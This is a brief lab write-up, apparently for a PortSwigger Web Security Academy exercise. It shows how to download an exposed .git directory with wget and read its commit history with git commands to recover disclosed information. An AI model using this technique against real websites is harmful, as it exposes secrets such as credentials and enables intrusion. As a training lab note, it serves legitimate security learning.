5 - Information disclosure in version control history
#infodisclosure #portswigger #writeup
bash
wget -r https://YOUR-LAB-ID.web-security-academy.net/.git/bash
git branch
git log
git show <hash commit>